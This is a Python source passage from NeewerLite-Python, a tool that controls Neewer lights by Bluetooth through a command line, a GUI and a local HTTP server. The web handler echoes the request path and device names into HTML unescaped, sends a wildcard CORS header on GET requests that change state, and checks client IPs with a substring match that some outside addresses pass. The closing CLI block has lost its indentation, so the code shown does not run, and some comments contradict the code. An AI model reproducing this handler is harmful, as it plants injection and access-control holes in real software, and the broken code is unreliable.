        elif listToProcess[a].find("--on") != -1:
            listToProcess[a] = "--on"
        elif listToProcess[a] == "--link": # --link needs a value, so give the bare flag a default of -1
            listToProcess[a] = "--link=-1"

    # PARSE THE ARGUMENT LIST FOR CUSTOM PARAMETERS
    parser = argparse.ArgumentParser()
    parser.add_argument("--list", action="store_true", help="Scan for nearby Neewer lights and list them on the CLI") # list the currently available lights
    parser.add_argument("--http", action="store_true", help="Use an HTTP server to send commands to Neewer lights using a web browser")
    parser.add_argument("--silent", action="store_false", help="Don't show any debug information in the console")
    parser.add_argument("--cli", action="store_false", help="Don't show the GUI at all, just send command to one light and quit")

    # HTML SERVER SPECIFIC PARAMETERS
    if inStartupMode == False:
        parser.add_argument("--discover", action="store_true") # tell the HTTP server to search for newly added lights
        parser.add_argument("--link", default=-1) # link a specific light to NeewerPython-Lite

    parser.add_argument("--on", action="store_true", help="Turn the light on")
    parser.add_argument("--off", action="store_true", help="Turn the light off")
    parser.add_argument("--light", default="", help="The MAC Address (XX:XX:XX:XX:XX:XX) of the light you want to send a command to or ALL to find and control all lights (only valid when also using --cli switch)")
    parser.add_argument("--mode", default="CCT", help="[DEFAULT: CCT] The current control mode - options are HSI, CCT and either ANM or SCENE")
    parser.add_argument("--temp", "--temperature", default="56", help="[DEFAULT: 56(00)K] (CCT mode) - the color temperature (3200K+) to set the light to")
    parser.add_argument("--hue", default="240", help="[DEFAULT: 240] (HSI mode) - the hue (0-360 degrees) to set the light to")
    parser.add_argument("--sat", "--saturation", default="100", help="[DEFAULT: 100] (HSI mode) The saturation (how vibrant the color is) to set the light to")
    parser.add_argument("--bri", "--brightness", "--intensity", default="100", help="[DEFAULT: 100] (CCT/HSI/ANM mode) The brightness (intensity) to set the light to")
    parser.add_argument("--scene", "--animation", default="1", help="[DEFAULT: 1] (ANM or SCENE mode) The animation (1-9) to use in Scene mode")

    args = parser.parse_args(listToProcess)

    if args.silent == True:
        if inStartupMode == True:
            if args.list != True: # if we're not looking for lights using --list, then print line
                printDebugString("Starting program with command-line arguments")
        else:
            printDebugString("Processing HTTP arguments")
            args.cli = False # we're running the CLI, so don't initialize the GUI
            args.silent = printDebug # we're not changing the silent flag, pass on the current printDebug setting

    if args.http == True:
        return ["HTTP", args.silent] # special mode - don't do any other mode/color/etc. processing, just jump into running the HTML server

    if inStartupMode == False:
        # HTTP specific parameter returns!
        if args.list == True:
            return["list"] # list the currently available lights

        if args.discover == True:
            return["discover"] # discover new lights

        if args.link != -1:
            return["link", args.link] # return the value defined by the parameter
    else:
        # If we request "LIST" from the CLI, then return a CLI list of lights available
        if args.list == True:
            return["LIST", False]

    # CHECK TO SEE IF THE LIGHT SHOULD BE TURNED OFF
    if args.on == True: # we want to turn the light on
        return [args.cli, args.silent, args.light, "ON"]
    elif args.off == True: # we want to turn the light off
        return [args.cli, args.silent, args.light, "OFF"]

    # IF THE LIGHT ISN'T BEING TURNED OFF, CHECK TO SEE IF MODES ARE BEING SET
    if args.mode.lower() == "hsi":
        return [args.cli, args.silent, args.light, "HSI",
                testValid("hue", args.hue, 240, 0, 360),
                testValid("sat", args.sat, 100, 0, 100),
                testValid("bri", args.bri, 100, 0, 100)]
    elif args.mode.lower() in ("anm", "scene"):
        return [args.cli, args.silent, args.light, "ANM",
                testValid("scene", args.scene, 1, 1, 9),
                testValid("bri", args.bri, 100, 0, 100)]
    else: # we've either asked for CCT mode, or gave an invalid mode name
        if args.mode.lower() != "cct": # if we're not actually asking for CCT mode, display error message
            printDebugString(" >> Improper mode selected with --mode command - valid entries are")
            printDebugString(" >> CCT, HSI or either ANM or SCENE, so rolling back to CCT mode.")

        # RETURN CCT MODE PARAMETERS IN CCT/ALL OTHER CASES
        return [args.cli, args.silent, args.light, "CCT",
                testValid("temp", args.temp, 56, 32, 85),
                testValid("bri", args.bri, 100, 0, 100)]
def processHTMLCommands(paramsList, loop):
    """Execute an already-parsed HTTP action list (from processCommands()) on the
    given asyncio loop, guarded by the global threadAction flag so only one
    operation runs at a time.

    Args:
        paramsList: the action list returned by processCommands().
        loop: the asyncio event loop to run the async light operations on.
    """
    global threadAction

    if threadAction == "": # if we're not already processing info in another thread
        threadAction = "HTTP" # claim the flag so the background thread / other requests wait

        if len(paramsList) != 0:
            if paramsList[0] == "discover": # we asked to discover new lights
                loop.run_until_complete(findDevices()) # find the lights available to control

                # try to connect to each light
                for a in range(len(availableLights)):
                    loop.run_until_complete(connectToLight(a, False))
            elif paramsList[0] == "link": # we asked to connect to a specific light
                selectedLights = returnLightIndexesFromMacAddress(paramsList[1])

                if len(selectedLights) > 0:
                    for a in range(len(selectedLights)):
                        loop.run_until_complete(connectToLight(selectedLights[a], False))
            else: # we want to write a value to a specific light
                # paramsList layout here: [cli, silent, light(s), mode, mode-specific values...]
                if paramsList[3] == "CCT": # calculate CCT bytestring
                    calculateByteString(colorMode=paramsList[3], temp=paramsList[4], brightness=paramsList[5])
                elif paramsList[3] == "HSI": # calculate HSI bytestring
                    calculateByteString(colorMode=paramsList[3], HSI_H=paramsList[4], HSI_S=paramsList[5], HSI_I=paramsList[6])
                elif paramsList[3] == "ANM": # calculate ANM/SCENE bytestring
                    calculateByteString(colorMode=paramsList[3], animation=paramsList[4], brightness=paramsList[5])
                elif paramsList[3] == "ON": # turn the light(s) on
                    setPowerBytestring("ON")
                elif paramsList[3] == "OFF": # turn the light(s) off
                    setPowerBytestring("OFF")

                selectedLights = returnLightIndexesFromMacAddress(paramsList[2])

                if len(selectedLights) > 0:
                    loop.run_until_complete(writeToLight(selectedLights, False))

        threadAction = "" # clear the thread variable
    else:
        printDebugString("The HTTP Server requested an action, but we're already working on one. Please wait...")
def returnLightIndexesFromMacAddress(addresses):
    """Translate a semicolon-separated list of light specifiers into availableLights indexes.

    Each specifier is either a 1-based index ("1", "2", ...) or a MAC address/GUID
    to be matched (case-insensitively) against the discovered lights. Invalid
    specifiers are silently dropped.

    Args:
        addresses: e.g. "1;2" or "11:22:33:44:55:66".

    Returns:
        A list of 0-based indexes into the global availableLights list.
    """
    addressesToCheck = addresses.split(";")
    foundIndexes = [] # the list of indexes for the lights you specified

    for a in range(len(addressesToCheck)):
        try: # if the specified light is just an index, then return the light you asked for
            currentLight = int(addressesToCheck[a]) - 1 # check to see if the current light can be converted to an integer

            # if the above succeeds, make sure that the index returned is a valid light index
            # BUGFIX: valid indexes are 0..len-1, so the upper-bound test must be >=
            # (the original "> len(availableLights)" let one out-of-range index through)
            if currentLight < 0 or currentLight >= len(availableLights):
                currentLight = -1 # if the index is out of the range of available lights, then... nada
        except ValueError: # we're most likely asking for a MAC address instead of an integer index
            currentLight = -1

            for b in range(len(availableLights)):
                if addressesToCheck[a].upper() == availableLights[b][0].address.upper(): # if the MAC address specified matches the current light
                    currentLight = b
                    break

        if currentLight != -1: # the found light index is valid
            foundIndexes.append(currentLight) # add the found index to the list of indexes

    return foundIndexes
class NLPythonServer(BaseHTTPRequestHandler):
    """HTTP request handler for the NeewerLite-Python web interface.

    Serves /NeewerLite-Python/doAction? URLs: query parameters are parsed by
    processCommands() and executed (in a worker thread) by processHTMLCommands().
    Only requests from whitelisted local IP ranges are accepted.
    """
    # NOTE(review): this class attribute is not what do_GET's bare `loop` resolves
    # to (a bare name inside a method reads the module-level `loop` from __main__)
    loop = asyncio.get_event_loop()

    def _send_cors_headers(self):
        # allow cross-origin GETs so browser front-ends on other ports can call us
        self.send_header("Access-Control-Allow-Origin", "*")
        self.send_header("Access-Control-Allow-Methods", "GET, OPTIONS")

    def do_OPTIONS(self):
        # CORS preflight: reply 200 with the allow headers and no body
        self.send_response(200)
        self._send_cors_headers()
        self.end_headers()

    def do_GET(self):
        if self.path == "/favicon.ico": # if favicon.ico is specified, then send a 404 error and stop processing
            try:
                self.send_error(404)
            except ConnectionAbortedError:
                printDebugString("Could not serve the error page, the HTTP server is already busy with another request.")

            return
        else:
            # CHECK THE LENGTH OF THE URL REQUEST AND SEE IF IT'S TOO LONG
            if len(self.path) > 159: # INCREASED LENGTH DUE TO ADDITION OF doAction IN THE URL
                # THE LAST REQUEST WAS WAY TOO LONG, SO QUICKLY RENDER AN ERROR PAGE AND RETURN FROM THE HTTP RENDERER
                writeHTMLSections(self, "header")
                writeHTMLSections(self, "errorHelp", "The last request you provided was too long! The NeewerLite-Python HTTP server can only accept URL commands less than 132 characters long after /NeewerLite-Python/doAction?.")
                writeHTMLSections(self, "footer")

                return

            # CHECK TO SEE IF THE IP REQUESTING ACCESS IS IN THE LIST OF "acceptableIPs"
            # This is the list of local IPs that the server lets through (outside requests return "Forbidden"
            # unless you specify that IP address or range - wildcards are just not typed in (192.168 is the same as 192.168.*.*) - in this list)
            # The list currently contains a wildcard of internal router IPs (192.168.*.*, 10.0.0.*, 127.20.*.*) and the loopback IP (127.0.0.1)
            # but any outside requests (unless you whitelist it below) will be forbidden from making a request
            acceptableIPs = ["192.168", "10.0.0", "172.20", "127.0.0.1"]

            clientIP = self.client_address[0] # the IP address of the machine making the request
            acceptedIP = False

            for check in range(len(acceptableIPs)): # check all the "accepted" IP addresses against the current requesting IP
                if acceptedIP != True: # if we haven't found the IP in the accepted list, then keep checking
                    if acceptableIPs[check] in clientIP:
                        acceptedIP = True # if we're good to go, then we can just move on

            # IF THE IP MAKING THE REQUEST IS NOT IN THE LIST OF APPROVED ADDRESSES, THEN RETURN A "FORBIDDEN" ERROR
            if acceptedIP == False:
                self.send_error(403, "The IP of the device you're making the request from (" + clientIP + ") has to be in the list of accepted IP addresses in order to use the NeewerLite-Python HTTP Server, any outside addresses will generate this Forbidden error. To use this device with NeewerLite-Python, add its IP address (or range of IP addresses) to the list of acceptable IPs")
                return

            acceptableURL = "/NeewerLite-Python/doAction?"

            if not acceptableURL in self.path: # if we ask for something that's not the main directory, then redirect to the main error page
                self.send_response(302)
                self.send_header('Location', acceptableURL)
                self.end_headers()

                return
            else: # if the URL contains "/NeewerLite-Python/doAction?" then it's a valid URL
                writeHTMLSections(self, "header")

                # BREAK THE URL INTO USABLE PARAMTERS
                paramsList = self.path.replace(acceptableURL, "").split("&") # split the included params into a list
                paramsList = processCommands(paramsList) # process the commands returned from the HTTP parameters

                if len(paramsList) == 0: # if we have no valid parameters, then say that in the error report
                    writeHTMLSections(self, "errorHelp", "You didn't provide any valid parameters in the last URL. To send multiple parameters to NeewerLite-Python, separate each one with a & character.")
                else:
                    self.wfile.write(bytes("<h1>Request Successful!</h1>", "utf-8"))
                    self.wfile.write(bytes("Last Request: <em>" + self.path + "</em><br>", "utf-8"))
                    self.wfile.write(bytes("From IP: <em>" + clientIP + "</em><br><br>", "utf-8"))

                    if paramsList[0] != "list":
                        # echo the parsed parameters back to the browser
                        self.wfile.write(bytes("Provided Parameters:<br>", "utf-8"))

                        if len(paramsList) <= 2: # short action lists ("discover", "link", ...) - just dump them
                            for a in range(len(paramsList)):
                                self.wfile.write(bytes("&nbsp;&nbsp;" + str(paramsList[a]) + "<br>", "utf-8"))
                        else: # a full light command - describe each field by its mode
                            self.wfile.write(bytes("&nbsp;&nbsp;Light(s) to connect to: " + str(paramsList[2]) + "<br>", "utf-8"))
                            self.wfile.write(bytes("&nbsp;&nbsp;Mode: " + str(paramsList[3]) + "<br>", "utf-8"))

                            if paramsList[3] == "CCT":
                                self.wfile.write(bytes("&nbsp;&nbsp;Color Temperature: " + str(paramsList[4]) + "00K<br>", "utf-8"))
                                self.wfile.write(bytes("&nbsp;&nbsp;Brightness: " + str(paramsList[5]) + "<br>", "utf-8"))
                            elif paramsList[3] == "HSI":
                                self.wfile.write(bytes("&nbsp;&nbsp;Hue: " + str(paramsList[4]) + "<br>", "utf-8"))
                                self.wfile.write(bytes("&nbsp;&nbsp;Saturation: " + str(paramsList[5]) + "<br>", "utf-8"))
                                self.wfile.write(bytes("&nbsp;&nbsp;Brightness: " + str(paramsList[6]) + "<br>", "utf-8"))
                            elif paramsList[3] == "ANM" or paramsList[3] == "SCENE":
                                self.wfile.write(bytes("&nbsp;&nbsp;Animation Scene: " + str(paramsList[4]) + "<br>", "utf-8"))
                                self.wfile.write(bytes("&nbsp;&nbsp;Brightness: " + str(paramsList[5]) + "<br>", "utf-8"))

                        # PROCESS THE HTML COMMANDS IN ANOTHER THREAD
                        htmlProcessThread = threading.Thread(target=processHTMLCommands, args=(paramsList, loop), name="htmlProcessThread")
                        htmlProcessThread.start()
                    else: # build the list of lights to display in the browser
                        totalLights = len(availableLights)

                        if totalLights == 0: # there are no lights available to you at the moment!
                            self.wfile.write(bytes("NeewerLite-Python is not currently set up with any Neewer lights. To discover new lights, <a href=""doAction?discover"">click here</a>.<br>", "utf-8"))
                        else:
                            self.wfile.write(bytes("List of available Neewer lights:<HR>", "utf-8"))
                            self.wfile.write(bytes("<TABLE WIDTH=""98%"" BORDER=""1"">", "utf-8"))
                            self.wfile.write(bytes("<TR>", "utf-8"))
                            self.wfile.write(bytes("<TH STYLE=""width:2%;text-align:left"">ID #", "utf-8"))
                            self.wfile.write(bytes("<TH STYLE=""width:20%;text-align:left"">Custom Name</TH>", "utf-8"))
                            self.wfile.write(bytes("<TH STYLE=""width:20%;text-align:left"">Light Type</TH>", "utf-8"))
                            self.wfile.write(bytes("<TH STYLE=""width:15%;text-align:left"">MAC Address/GUID</TH>", "utf-8"))
                            self.wfile.write(bytes("<TH STYLE=""width:5%;text-align:left"">RSSI</TH>", "utf-8"))
                            self.wfile.write(bytes("<TH STYLE=""width:5%;text-align:left"">Linked</TH>", "utf-8"))
                            self.wfile.write(bytes("<TH STYLE=""width:33%;text-align:left"">Last Sent Value</TH>", "utf-8"))
                            self.wfile.write(bytes("</TR>", "utf-8"))

                            for a in range(totalLights):
                                self.wfile.write(bytes("<TR>", "utf-8"))
                                self.wfile.write(bytes("<TD>" + str(a + 1) + "</TD>", "utf-8")) # light ID #
                                self.wfile.write(bytes("<TD>" + availableLights[a][2] + "</TD>", "utf-8")) # light custom name
                                self.wfile.write(bytes("<TD>" + availableLights[a][0].name + "</TD>", "utf-8")) # light type
                                self.wfile.write(bytes("<TD>" + availableLights[a][0].address + "</TD>", "utf-8")) # light MAC address
                                self.wfile.write(bytes("<TD>" + str(availableLights[a][0].rssi) + " dbM</TD>", "utf-8")) # light RSSI (signal quality)

                                # probing .is_connected raises when there is no Bleak connection
                                # object yet - treat that the same as "not linked"
                                try:
                                    if availableLights[a][1].is_connected:
                                        self.wfile.write(bytes("<TD>" + "Yes" + "</TD>", "utf-8")) # is the light linked?
                                    else:
                                        self.wfile.write(bytes("<TD>" + "<A HREF=link=" + str(a + 1) + ">No</A></TD>", "utf-8")) # is the light linked?
                                except Exception as e:
                                    self.wfile.write(bytes("<TD>" + "<A HREF=link=" + str(a + 1) + ">Nope!</A></TD>", "utf-8")) # is the light linked?

                                self.wfile.write(bytes("<TD>" + updateStatus(False, availableLights[a][3]) + "</TD>", "utf-8")) # the last sent value to the light
                                self.wfile.write(bytes("</TR>", "utf-8"))

                            self.wfile.write(bytes("</TABLE>", "utf-8"))

                writeHTMLSections(self, "footer") # add the footer to the bottom of the page
def writeHTMLSections(self, theSection, errorMsg = ""):
    """Write a standard section of the web interface to an HTTP response.

    Args:
        self: the BaseHTTPRequestHandler instance currently serving the request
              (this is a module-level helper, not a method - the handler is passed in).
        theSection: "header" (status line + HTML opening), "errorHelp" (usage help
                    page for an invalid request) or "footer" (links + HTML closing).
        errorMsg: the specific error to show at the top of the "errorHelp" section.
    """
    if theSection == "header":
        # status line, CORS + content-type headers, then the document opening
        self.send_response(200)
        self._send_cors_headers()
        self.send_header("Content-type", "text/html")
        self.end_headers()

        self.wfile.write(bytes("<html><head><title>NeewerLite-Python HTTP Server</title></head>", "utf-8"))
        self.wfile.write(bytes("<body>", "utf-8"))
    elif theSection == "errorHelp":
        # show the specific error first, then the full parameter reference
        self.wfile.write(bytes("<h1>Invalid request!</h1>", "utf-8"))
        self.wfile.write(bytes("Last Request: <em>" + self.path + "</em><br>", "utf-8"))
        self.wfile.write(bytes(errorMsg + "<br><br>", "utf-8"))
        self.wfile.write(bytes("Valid parameters to use -<br>", "utf-8"))
        self.wfile.write(bytes("<strong>list</strong> - list the current lights NeewerPython-Lite has available to it<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Example: <em>http://(server address)/NeewerLite-Python/doAction?list</em><br>", "utf-8"))
        self.wfile.write(bytes("<strong>discover</strong> - tell NeewerLite-Python to scan for new lights<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Example: <em>http://(server address)/NeewerLite-Python/doAction?discover</em><br>", "utf-8"))
        self.wfile.write(bytes("<strong>link=</strong> - (value: <em>index of light to link to</em>) manually link to a specific light - you can specify multiple lights with semicolons (so link=1;2 would try to link to both lights 1 and 2)<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Example: <em>http://(server address)/NeewerLite-Python/doAction?link=1</em><br>", "utf-8"))
        self.wfile.write(bytes("<strong>light=</strong> - the MAC address (or current index of the light) you want to send a command to - you can specify multiple lights with semicolons (so light=1;2 would send a command to both lights 1 and 2)<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Example: <em>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66</em><br>", "utf-8"))
        self.wfile.write(bytes("<strong>mode=</strong> - the mode (value: <em>HSI, CCT, and either ANM or SCENE</em>) - the color mode to switch the light to<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Example: <em>http://(server address)/NeewerLite-Python/doAction?mode=CCT</em><br>", "utf-8"))
        self.wfile.write(bytes("(CCT mode only) <strong>temp=</strong> or <strong>temperature=</strong> - (value: <em>3200 to 8500</em>) the color temperature in CCT mode to set the light to<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Example: <em>http://(server address)/NeewerLite-Python/doAction?temp=5200</em><br>", "utf-8"))
        self.wfile.write(bytes("(HSI mode only) <strong>hue=</strong> - (value: <em>0 to 360</em>) the hue value in HSI mode to set the light to<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Example: <em>http://(server address)/NeewerLite-Python/doAction?hue=240</em><br>", "utf-8"))
        self.wfile.write(bytes("(HSI mode only) <strong>sat=</strong> or <strong>saturation=</strong> - (value: <em>0 to 100</em>) the color saturation value in HSI mode to set the light to<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Example: <em>http://(server address)/NeewerLite-Python/doAction?sat=65</em><br>", "utf-8"))
        self.wfile.write(bytes("(ANM/SCENE mode only) <strong>scene=</strong> - (value: <em>1 to 9</em>) which animation (scene) to switch the light to<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Example: <em>http://(server address)/NeewerLite-Python/doAction?scene=3</em><br>", "utf-8"))
        self.wfile.write(bytes("(CCT/HSI/ANM modes) <strong>bri=</strong>, <strong>brightness=</strong> or <strong>intensity=</strong> - (value: <em>0 to 100</em>) how bright you want the light<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Example: <em>http://(server address)/NeewerLite-Python/doAction?brightness=80</em><br>", "utf-8"))
        self.wfile.write(bytes("<br><br>More examples -<br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Set the light with MAC address <em>11:22:33:44:55:66</em> to <em>CCT</em> mode, with a color temperature of <em>5200</em> and brightness of <em>40</em><br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;<em>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66&mode=CCT&temp=5200&bri=40</em><br><br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Set the light with MAC address <em>11:22:33:44:55:66</em> to <em>HSI</em> mode, with a hue of <em>70</em>, saturation of <em>50</em> and brightness of <em>10</em><br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;<em>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66&mode=HSI&hue=70&sat=50&bri=10</em><br><br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;Set the first light available to <em>SCENE</em> mode, using the <em>first</em> animation and brightness of <em>55</em><br>", "utf-8"))
        self.wfile.write(bytes("&nbsp;&nbsp;<em>http://(server address)/NeewerLite-Python/doAction?light=1&mode=SCENE&scene=1&bri=55</em><br>", "utf-8"))
    elif theSection == "footer":
        # shortcut links, version/credit line and the document closing
        footerLinks = "Shortcut links: "
        footerLinks = footerLinks + "<A HREF=""doAction?discover"">Scan for New Lights</A> | "
        footerLinks = footerLinks + "<A HREF=""doAction?list"">List Currently Available Lights</A>"

        self.wfile.write(bytes("<HR>" + footerLinks + "<br>", "utf-8"))
        self.wfile.write(bytes("<A HREF=""https://github.com/taburineagle/NeewerLite-Python/"">NeewerLite-Python 0.6b</A> by Zach Glenwright<br>", "utf-8"))
        self.wfile.write(bytes("</body></html>", "utf-8"))
def formatStringForConsole(theString, maxLength):
    """Fit theString into exactly maxLength characters for tabular console output.

    A string of "-" expands to a full-width divider row; shorter strings are
    right-padded with spaces; longer strings are truncated and flagged with " ...".
    """
    if theString == "-": # special case: render a horizontal divider row
        return "-" * maxLength

    overflow = len(theString) - maxLength

    if overflow == 0: # already exactly the right width
        return theString
    elif overflow < 0: # too short - pad the right side with spaces
        return theString.ljust(maxLength)

    # too long - keep what fits and mark the truncation
    return theString[:maxLength - 4] + " ..."
if __name__ == '__main__':
    loop = asyncio.get_event_loop() # get the current asyncio loop
    cmdReturn = [True] # initially set to show the GUI interface over the CLI interface

    if len(sys.argv) > 1: # if we have more than 1 argument on the command line (the script itself is argument 1), then process switches
        cmdReturn = processCommands()
        printDebug = cmdReturn[1] # if we use the --quiet option, then don't show debug strings in the console

        # START HTTP SERVER HERE AND SIT IN THIS LOOP UNTIL THE END
        if cmdReturn[0] == "HTTP":
            webServer = ThreadingHTTPServer(("", 8080), NLPythonServer)

            try:
                printDebugString("Starting the HTTP Server on Port 8080...")
                printDebugString("-------------------------------------------------------------------------------------")

                # start the HTTP server and wait for requests
                webServer.serve_forever()
            except KeyboardInterrupt: # Ctrl+C is the normal way to stop the server
                pass
            finally:
                printDebugString("Stopping the HTTP Server...")
                webServer.server_close()

            # DISCONNECT FROM EACH LIGHT BEFORE FINISHING THE PROGRAM
            for a in range(0, len(availableLights)):
                printDebugString("Attempting to unlink from light #" + str(a + 1) + " (" + str(a + 1) + " of " + str(len(availableLights)) + " lights to unlink)")
                loop.run_until_complete(disconnectFromLight(a)) # disconnect from each light, one at a time

            printDebugString("Closing the program NOW")
            sys.exit(0)

        # LIST MODE: scan, print a formatted table of found lights, then quit
        if cmdReturn[0] == "LIST":
            print("NeewerLite-Python 0.6b by Zach Glenwright")
            print("Searching for nearby Neewer lights...")
            loop.run_until_complete(findDevices())

            if len(availableLights) > 0:
                print()

                if len(availableLights) == 1: # we only found one
                    print("We found 1 Neewer light on the last search.")
                else: # we found more than one
                    print("We found " + str(len(availableLights)) + " Neewer lights on the last search.")

                print()

                if platform.system() == "Darwin": # if we're on MacOS, then we display the GUID instead of the MAC address
                    addressCharsAllowed = 36 # GUID addresses are 36 characters long
                    addressString = "GUID (MacOS)"
                else:
                    addressCharsAllowed = 17 # MAC addresses are 17 characters long
                    addressString = "MAC Address"

                nameCharsAllowed = 79 - addressCharsAllowed # the remaining space is to display the light name

                # PRINT THE HEADERS
                print(formatStringForConsole("Custom Name (Light Type)", nameCharsAllowed) + \
                      " " + \
                      formatStringForConsole(addressString, addressCharsAllowed))

                # PRINT THE SEPARATORS
                print(formatStringForConsole("-", nameCharsAllowed) + " " + formatStringForConsole("-", addressCharsAllowed))

                # PRINT THE LIGHTS
                for a in range(len(availableLights)):
                    lightName = availableLights[a][2] + "(" + availableLights[a][0].name + ")"
                    print(formatStringForConsole(lightName, nameCharsAllowed) + " " + \
                          formatStringForConsole(availableLights[a][0].address, addressCharsAllowed))
                    print(formatStringForConsole(" > RSSI: " + str(availableLights[a][0].rssi) + "dBm", nameCharsAllowed))
            else:
                print("We did not find any Neewer lights on the last search.")

            sys.exit(0) # show the list, then quit out to the command line

        # report the parsed command-line settings to the debug log
        printDebugString(" > Launch GUI: " + str(cmdReturn[0]))
        printDebugString(" > Show Debug Strings on Console: " + str(cmdReturn[1]))
        printDebugString(" > Mode: " + cmdReturn[3])

        if cmdReturn[3] == "CCT":
            printDebugString(" > Color Temperature: " + str(cmdReturn[4]) + "00K")
            printDebugString(" > Brightness: " + str(cmdReturn[5]))
        elif cmdReturn[3] == "HSI":
            printDebugString(" > Hue: " + str(cmdReturn[4]))
            printDebugString(" > Saturation: " + str(cmdReturn[5]))
            printDebugString(" > Brightness: " + str(cmdReturn[6]))
        elif cmdReturn[3] == "ANM":
            printDebugString(" > Scene: " + str(cmdReturn[4]))
            printDebugString(" > Brightness: " + str(cmdReturn[5]))

        if cmdReturn[0] == False: # if we're not showing the GUI, we need to specify a MAC address
            if cmdReturn[2] != "":
                printDebugString("-------------------------------------------------------------------------------------")
                printDebugString(" > CLI >> MAC Address of light to send command to: " + cmdReturn[2].upper())
                loop.run_until_complete(connectToOneLight(cmdReturn[2])) # get Bleak object linking to this specific light and getting custom prefs
            else:
                printDebugString("-------------------------------------------------------------------------------------")
                printDebugString(" > CLI >> You did not specify a light to send the command to - use the --light switch")
                printDebugString(" > CLI >> and write either a MAC Address (XX:XX:XX:XX:XX:XX) to a Neewer light or")
                printDebugString(" > CLI >> ALL to send to all available Neewer lights found by Bluetooth")
                printDebugString("-------------------------------------------------------------------------------------")

    if cmdReturn[0] == True: # launch the GUI with the command-line arguments
        if importError == 0:
            try: # try to load the GUI
                app = QApplication(sys.argv)
                mainWindow = MainWindow()

                # SET UP GUI BASED ON COMMAND LINE ARGUMENTS
                if len(cmdReturn) > 1:
                    if cmdReturn[3] == "CCT": # set up the GUI in CCT mode with specified parameters (or default, if none)
                        mainWindow.setUpGUI(colorMode=cmdReturn[3], temp=cmdReturn[4], brightness=cmdReturn[5])
                    elif cmdReturn[3] == "HSI": # set up the GUI in HSI mode with specified parameters (or default, if none)
                        mainWindow.setUpGUI(colorMode=cmdReturn[3], hue=cmdReturn[4], sat=cmdReturn[5], brightness=cmdReturn[6])
                    elif cmdReturn[3] == "ANM": # set up the GUI in ANM mode with specified parameters (or default, if none)
                        mainWindow.setUpGUI(colorMode=cmdReturn[3], scene=cmdReturn[4], brightness=cmdReturn[5])

                mainWindow.show()

                # START THE BACKGROUND THREAD
                # NOTE(review): this rebinds the module-level name workerThread (the function)
                # to the Thread object - it works because target= is captured first, but the
                # function is unreachable by name afterwards
                workerThread = threading.Thread(target=workerThread, args=(loop,), name="workerThread")
                workerThread.start()

                ret = app.exec_()
                sys.exit( ret )
            except NameError:
                pass # same as above - we could not load the GUI, but we have already sorted error messages
        else:
            if importError == 1: # we can't load PySide2
                print(" ===== CAN NOT FIND PYSIDE2 LIBRARY =====")
                print(" You don't have the PySide2 Python library installed. If you're only running NeewerLite-Python from")
                print(" a command-line (from a Raspberry Pi CLI for instance), or using the HTTP server, you don't need this package.")
                print(" If you want to launch NeewerLite-Python with the GUI, you need to install the PySide2 package.")
                print()
                print(" To install PySide2, run either pip or pip3 from the command line:")
                print("    pip install PySide2")
                print("    pip3 install PySide2")
                print()
                print(" Or visit this website for more information:")
                print("    https://pypi.org/project/PySide2/")
            elif importError == 2: # we have PySide2, but can't load the GUI file itself for some reason
                print(" ===== COULD NOT LOAD/FIND GUI FILE =====")
                print(" If you don't need to use the GUI, you are fine going without the PySide2 pacakge.")
                print(" but using NeewerLite-Python with the GUI requires the PySide2 library.")
                print()
                print(" If you have already installed the PySide2 library but are still getting this error message,")
                print(" Make sure you have the ui_NeewerLightUI.py script in the same directory as NeewerLite-Python.py")
                print(" If you don't know where that file is, redownload the NeewerLite-Python package from Github here:")
                print(" https://github.com/taburineagle/NeewerLite-Python/")

            sys.exit(1) # quit out, we can't run the program without PySide2 or the GUI (for the GUI version, at least)
else: # don't launch the GUI, send command to a light/lights and quit out
if len(cmdReturn) > 1:
if cmdReturn[3] == "CCT": # calculate CCT bytestring
calculateByteString(colorMode=cmdReturn[3], temp=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "HSI": # calculate HSI bytestring
calculateByteString(colorMode=cmdReturn[3], HSI_H=cmdReturn[4], HSI_S=cmdReturn[5], HSI_I=cmdReturn[6])
elif cmdReturn[3] == "ANM": # calculate ANM/SCENE bytestring
calculateByteString(colorMode=cmdReturn[3], animation=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "ON": # turn the light on
setPowerBytestring("ON")
elif cmdReturn[3] == "OFF": # turn the light off
setPowerBytestring("OFF")
if availableLights != []:
printDebugString(" > CLI >> Bytestring to send to light:" + updateStatus())
# CONNECT TO THE LIGHT AND SEND INFORMATION TO IT
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to connect to light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(connectToLight(0, False))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error connecting to light " + str(maxNumOfAttempts) + " times - quitting out")
sys.exit(1)
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to write to light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(writeToLight(0, False))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error writing to light " + str(maxNumOfAttempts) + " times - quitting out")
